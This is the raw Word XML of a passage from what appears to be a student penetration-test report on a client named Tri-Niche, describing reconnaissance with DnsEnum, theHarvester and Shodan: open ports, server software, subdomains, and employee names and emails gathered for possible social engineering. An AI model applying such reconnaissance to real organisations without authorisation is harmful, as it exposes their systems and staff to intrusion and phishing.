    </w:p>
    <w:p w14:paraId="3FF20040" w14:textId="561001CA" w:rsidR="00CA174B" w:rsidRDefault="00CA174B" w:rsidP="00595CEA">
      <w:r w:rsidRPr="00CA174B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F21934D" wp14:editId="18C8C5E3">
            <wp:extent cx="5943600" cy="2353310"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2353310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24392576" w14:textId="5EED06C2" w:rsidR="00CA174B" w:rsidRDefault="003E3654" w:rsidP="003E3654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Registered Under Google</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462937FD" w14:textId="7657F567" w:rsidR="003E3654" w:rsidRDefault="003E3654" w:rsidP="003E3654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>NetRange: 34.128.0.0 – 34.191.255.255</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276E74F8" w14:textId="5D0AF4E5" w:rsidR="003E3654" w:rsidRDefault="005C683B" w:rsidP="003E3654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uses Microsoft Internet Information Services (IIS)</w:t>
      </w:r>
      <w:r w:rsidR="005834D0">
        <w:t xml:space="preserve"> version 10.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09ACAC62" w14:textId="1CF98030" w:rsidR="00CF7F68" w:rsidRDefault="00CF7F68" w:rsidP="003E3654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uses Javascript, Jquery, Bootstrap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB77540" w14:textId="497DDDF2" w:rsidR="00CF7F68" w:rsidRDefault="00CF7F68" w:rsidP="003E3654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Open Ports are 22, 80, 3389</w:t>
      </w:r>
      <w:r w:rsidR="009569E5">
        <w:t>. 80 uses IIS, 22 uses OPENSSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB86567" w14:textId="66F85C3B" w:rsidR="00DE5F57" w:rsidRDefault="00DE5F57" w:rsidP="003E3654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="00F3092F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Juicebar.capstone@gmail.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5A5DF103" w14:textId="0861E836" w:rsidR="00DE5F57" w:rsidRDefault="00DE5F57" w:rsidP="003E3654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hosted on Google Cloud</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F160C20" w14:textId="29EBCD1A" w:rsidR="005834D0" w:rsidRDefault="0037018A" w:rsidP="003E3654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Potentially using ASP.NET Core framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562819CA" w14:textId="3C424B45" w:rsidR="0037018A" w:rsidRDefault="004E36F0" w:rsidP="003E3654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No </w:t>
      </w:r>
      <w:r w:rsidR="00194EAB">
        <w:t>Presence of a robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0233CB47" w14:textId="2558461C" w:rsidR="00595CEA" w:rsidRDefault="00595CEA" w:rsidP="00F81A1B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>DnsEnum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46865E23" w14:textId="6B38D3DB" w:rsidR="00BA5E33" w:rsidRDefault="00BA5E33" w:rsidP="00BA5E33">
      <w:r>
        <w:t xml:space="preserve">Fuzzing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2113AB" w14:textId="6D28D08E" w:rsidR="00BA5E33" w:rsidRDefault="00BA5E33" w:rsidP="00BA5E33">
      <w:r>
        <w:t>Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3EB7E1" w14:textId="659400E4" w:rsidR="00D56733" w:rsidRPr="00BA5E33" w:rsidRDefault="00D56733" w:rsidP="00BA5E33">
      <w:r>
        <w:t>Perform NMAPSCAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36590137" w14:textId="69D81E92" w:rsidR="002B6FFE" w:rsidRPr="002B6FFE" w:rsidRDefault="002B6FFE" w:rsidP="002B6FFE">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Performed by: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Colin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAF0B8E" w14:textId="2BA43EDB" w:rsidR="00BD15DA" w:rsidRPr="00A62BD1" w:rsidRDefault="00A62BD1" w:rsidP="008C4F5C">
      <w:r>
        <w:t xml:space="preserve">This tool is a multithreaded script to enumerate </w:t>
      </w:r>
      <w:r w:rsidR="00B76459">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">DNS information of a specific domain. The main purpose of DnsEnum is to gather as much information as possible </w:t>
      </w:r>
      <w:r w:rsidR="00F7784F">
        <w:t>about</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hrcms-admin.tri-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>niche.com.</w:t>
      </w:r>
      <w:r w:rsidR="009A1653">
        <w:t xml:space="preserve"> However, </w:t>
      </w:r>
      <w:r w:rsidR="00FA2617">
        <w:t xml:space="preserve">due to an unknown reason, </w:t>
      </w:r>
      <w:r w:rsidR="009467F5">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="007C3F8E">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00EC4FAF">
        <w:t>ubdomain</w:t>
      </w:r>
      <w:r w:rsidR="00EF0A4F">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00F038AD">
        <w:t xml:space="preserve"> of</w:t>
      </w:r>
      <w:r w:rsidR="00EC4FAF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00802758">
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="00EC4FAF">
        <w:t>rcms-admin</w:t>
      </w:r>
      <w:r w:rsidR="000E230A">
        <w:t>.tri</w:t>
      </w:r>
      <w:r w:rsidR="00665250">
        <w:t>-niche.com</w:t>
      </w:r>
      <w:r w:rsidR="007C3F8E">
        <w:t>’s</w:t>
      </w:r>
      <w:r w:rsidR="009467F5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006C7783">
        <w:t>DNS servers and DNS entries</w:t>
      </w:r>
      <w:r w:rsidR="00691CCB">
        <w:t xml:space="preserve"> could not be </w:t>
      </w:r>
      <w:r w:rsidR="003A21C7">
        <w:t>enumerated</w:t>
      </w:r>
      <w:r w:rsidR="00DB6343">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00857F0A">
        <w:t xml:space="preserve"> and no data of the </w:t>
      </w:r>
      <w:r w:rsidR="00C915E4">
        <w:t>subdomain</w:t>
      </w:r>
      <w:r w:rsidR="00EF0A4F">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00C915E4">
        <w:t xml:space="preserve"> could be </w:t>
      </w:r>
      <w:r w:rsidR="00C45F5D">
        <w:t>extracted</w:t>
      </w:r>
      <w:r w:rsidR="00024968">
        <w:t xml:space="preserve"> as seen below</w:t>
      </w:r>
      <w:r w:rsidR="003A21C7">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A69C49F" w14:textId="59B62D5E" w:rsidR="00971F60" w:rsidRDefault="00C53217" w:rsidP="00552299">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00C53217">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62F702CD" wp14:editId="5A131F48">
            <wp:extent cx="4340431" cy="1834018"/>
            <wp:effectExtent l="0" t="0" r="317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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4340431" cy="1834018"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkStart w:id="13" w:name="_Toc93487279"/>
      <w:bookmarkStart w:id="14" w:name="_Toc93502854"/>
    </w:p>
    <w:p w14:paraId="55ABC8EE" w14:textId="65EB505B" w:rsidR="00BD15DA" w:rsidRDefault="00971F60" w:rsidP="007B3DE2">
      <w:r>
        <w:t>However, when enumerating the domain of tri-niche.com, the tool was able to retrieve the relevant subdomains such as biometric, ryujinshanew, training</w:t>
      </w:r>
      <w:r w:rsidR="009F576B">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and webmail with name servers from namecheaphosting.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046"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD15DA" w14:paraId="6CA3D306" w14:textId="77777777" w:rsidTr="008E313B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="407E02DB" w14:textId="220A09CC" w:rsidR="00BD15DA" w:rsidRDefault="00BD15DA" w:rsidP="00BF5B27">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00DD4D4B">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7626A94D" wp14:editId="63C336FA">
                  <wp:extent cx="2363637" cy="3170553"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="18946384" name="Picture 18946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6"/>
                          <a:srcRect b="43713"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2406153" cy="322758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D4073B6" w14:textId="0AFD10BA" w:rsidR="00BD15DA" w:rsidRDefault="00BD15DA" w:rsidP="00BF5B27">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00DD4D4B">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2977710F" wp14:editId="2B77FF97">
                  <wp:extent cx="3064409" cy="3169920"/>
                  <wp:effectExtent l="0" t="0" r="3175" b="0"/>
                  <wp:docPr id="18946385" name="Picture 18946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6"/>
                          <a:srcRect t="56594"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3106497" cy="32134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E51B8F" w14:textId="77777777" w:rsidR="00BF5B27" w:rsidRPr="00BF5B27" w:rsidRDefault="00BF5B27" w:rsidP="00BF5B27"/>
    <w:p w14:paraId="39B0030B" w14:textId="796904CC" w:rsidR="00A31687" w:rsidRDefault="00A03202" w:rsidP="00A31687">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc93526887"/>
      <w:bookmarkStart w:id="16" w:name="_Toc94100216"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="000D4F91">
        <w:t>Internet/WWW</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="4EBF6321" w14:textId="29FD70B6" w:rsidR="0080131C" w:rsidRDefault="00E72E72" w:rsidP="003132EA">
      <w:r>
        <w:t xml:space="preserve">Information retrieved in this section </w:t>
      </w:r>
      <w:r w:rsidR="7A47D4CE">
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gathered from the World</w:t>
      </w:r>
      <w:r w:rsidR="00B96352">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>Wide</w:t>
      </w:r>
      <w:r w:rsidR="00B96352">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Web (WWW) pages or free data </w:t>
      </w:r>
      <w:r w:rsidR="3BE19891">
        <w:t>sites</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from the Internet. </w:t>
      </w:r>
      <w:r w:rsidR="00A37ADC">
        <w:t>This section</w:t>
      </w:r>
      <w:r w:rsidR="00B96352">
        <w:t xml:space="preserve"> will discuss the different tools used to perform intelligence gathering through the Internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766DA4EB" w14:textId="77777777" w:rsidR="00573295" w:rsidRDefault="00573295" w:rsidP="003132EA"/>
    <w:p w14:paraId="7719E58A" w14:textId="77777777" w:rsidR="00537EFF" w:rsidRDefault="00537EFF">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AE595F" w14:textId="620F115C" w:rsidR="00573295" w:rsidRDefault="00573295" w:rsidP="00573295">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>theHarvester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A78162" w14:textId="0FDDEE16" w:rsidR="00573295" w:rsidRDefault="00573295" w:rsidP="00573295">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Performed by: </w:t>
      </w:r>
      <w:r w:rsidR="007B3DE2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Colin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708E9505" w14:textId="1E9EF959" w:rsidR="00573295" w:rsidRDefault="00573295" w:rsidP="00573295">
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00743F6B">
        <w:t>he</w:t>
      </w:r>
      <w:r>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="00743F6B">
        <w:t>arvester</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a tool that searches for any related information such </w:t>
      </w:r>
      <w:r w:rsidR="009F576B">
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">LinkedIn, </w:t>
      </w:r>
      <w:r w:rsidR="00640195">
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:t>oogle as well as the various popular search engines for any affiliated E-mail addresses of possible employees of the organization through public information. The information gathered can be used for social engineering purposes. theHarvester narrows the search and print</w:t>
      </w:r>
      <w:r w:rsidR="00B4098A">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or store</w:t>
      </w:r>
      <w:r w:rsidR="00B4098A">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the collected data in an organized format. In this case</w:t>
      </w:r>
      <w:r w:rsidR="009F576B">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the search is narrowed down through LinkedIn. </w:t>
      </w:r>
      <w:r w:rsidR="00FF472E">
        <w:t>From</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> searching through all sources for information, there were affiliated employees of </w:t>
      </w:r>
      <w:r w:rsidR="00640195">
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t>ri-</w:t>
      </w:r>
      <w:r w:rsidR="00640195">
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:t>iche found including Erwin</w:t>
      </w:r>
      <w:r w:rsidR="6DBDA5A6">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the client representative himself.</w:t>
      </w:r>
      <w:r w:rsidR="00047703">
        <w:t xml:space="preserve"> The email of Josh Ching as well as many subdomains of Tri-Niche</w:t>
      </w:r>
      <w:r w:rsidR="002814D7">
        <w:t xml:space="preserve"> indicative of their </w:t>
      </w:r>
      <w:r w:rsidR="0060178B">
        <w:t>web application projects</w:t>
      </w:r>
      <w:r w:rsidR="00C56A89">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AE0252" w:rsidRPr="00AE0252">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573295" w14:paraId="19AA6020" w14:textId="77777777" w:rsidTr="00AE0252">
        <w:trPr>
          <w:trHeight w:val="6662"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2641AA3F" w14:textId="5761D906" w:rsidR="00573295" w:rsidRDefault="00AE0252" w:rsidP="00FB0AE5">
            <w:r w:rsidRPr="00A87324">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41BFB4AD" wp14:editId="3BD398A0">
                  <wp:extent cx="2806700" cy="3895942"/>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stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2823528" cy="3919301"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4742" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B7BF5A3" w14:textId="0DD82C30" w:rsidR="00573295" w:rsidRDefault="00D87D5A" w:rsidP="00FB0AE5">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658255" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="722EBFD8" wp14:editId="0FC77803">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>-2347</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>204498</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1451113" cy="163001"/>
                      <wp:effectExtent l="0" t="0" r="15875" b="27940"/>
                      <wp:wrapNone/>
                      <wp:docPr id="18946407" name="Rectangle 18946407"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="1451113" cy="1630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4F40A3">
                    <v:rect id="Rectangle 18946407" style="position:absolute;margin-left:-.2pt;margin-top:16.1pt;width:114.25pt;height:12.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443A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wCgwIAAGkFAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1v2zAMvQ/YfxB0X22nSbcG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"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidR="00496C9C" w:rsidRPr="00496C9C">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E8A3DBE" wp14:editId="575B17B2">
                  <wp:extent cx="2865966" cy="1152816"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="18946402" name="Picture 1894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1812" cy="1155168"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="402D01C9" w14:textId="53D0956F" w:rsidR="00573295" w:rsidRDefault="00AE0252" w:rsidP="007F4F12">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658256" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="40648B70" wp14:editId="6B5E80B9">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>854</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>67986</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="571784" cy="90247"/>
                      <wp:effectExtent l="0" t="0" r="19050" b="24130"/>
                      <wp:wrapNone/>
                      <wp:docPr id="18946427" name="Rectangle 18946427"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr/>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="571784" cy="902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7A1D37">
                    <v:rect id="Rectangle 18946427" style="position:absolute;margin-left:.05pt;margin-top:5.35pt;width:45pt;height:7.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D3FF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"/>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidR="00917BBA" w:rsidRPr="00917BBA">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="252F6F48" wp14:editId="6A4163FE">
                  <wp:extent cx="2885590" cy="2660230"/>
                  <wp:effectExtent l="0" t="0" r="0" b="6985"/>
                  <wp:docPr id="18946417" name="Picture 1894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855" cy="2669694"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="50E2C666" w14:textId="692DA204" w:rsidR="007F4F12" w:rsidRDefault="00537EFF" w:rsidP="00D66DDE">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E79C623" w14:textId="3787C749" w:rsidR="00573295" w:rsidRDefault="00573295" w:rsidP="00573295">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="009D64A9">
        <w:lastRenderedPageBreak/>
        <w:t>Shodan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B31085" w14:textId="4059441D" w:rsidR="00573295" w:rsidRPr="00B722CF" w:rsidRDefault="00573295" w:rsidP="00573295">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Performed by: </w:t>
      </w:r>
      <w:r w:rsidR="007B3DE2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Yi Qian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608D960E" w14:textId="7691C66D" w:rsidR="00573295" w:rsidRDefault="00573295" w:rsidP="00573295">
      <w:r>
        <w:t xml:space="preserve">Shodan is a search engine tool that </w:t>
      </w:r>
      <w:r w:rsidR="53068215">
        <w:t>lets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> public users scan for the various devices that are connected to the Internet. Data retrieved from Shodan contains metadata the server sends back to the client. From the information retrieved as shown below, it derived the multiple open</w:t>
      </w:r>
      <w:r w:rsidR="00177B32">
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ports</w:t>
      </w:r>
      <w:r w:rsidR="00F73B8B">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0010015A">
        <w:t>Web technologies</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A90CAC">
        <w:t>such as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bootstrap and </w:t>
      </w:r>
      <w:r w:rsidR="009E2A72">
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">eCAPTCHA </w:t>
      </w:r>
      <w:r w:rsidR="0010015A">
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> implemented </w:t>
      </w:r>
      <w:r w:rsidR="0010015A">
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4735BD5C" w14:textId="07A623D2" w:rsidR="00573295" w:rsidRDefault="00970C3A" w:rsidP="00573295">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658249" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0BB8E7DD" wp14:editId="32E0AC4D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>282272</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2344310</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1097280" cy="194503"/>
                <wp:effectExtent l="0" t="0" r="26670" b="15240"/>
                <wp:wrapNone/>
                <wp:docPr id="18946398" name="Rectangle 18946398"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
